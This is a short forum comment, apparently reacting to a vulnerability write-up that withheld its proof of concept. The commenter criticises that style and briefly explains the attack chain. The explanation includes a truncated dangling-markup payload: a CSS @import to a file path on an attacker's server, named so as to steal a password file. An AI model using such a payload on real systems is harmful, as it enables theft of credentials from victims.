> I will not leave a PoC for this chapter but I promise you, it will not be that difficult to figure out after reading the above two parts I find this kind of annoying. Either write about the vulnerability or don't.
So... First vulnerability is that you can force someone to hit 2nd vulnerability is that you can print a password file (or other file) inside the text editor A dangling markup attack is an attack that sends you information as part of the url request up to the next quote So you could do this and someone has sent you the contents of the password file when trying to get css @import{ "file:///net/MYSERVER.COM/stealpasswo…
But my broader point was less the how, and more that the style of writing was obnoxious.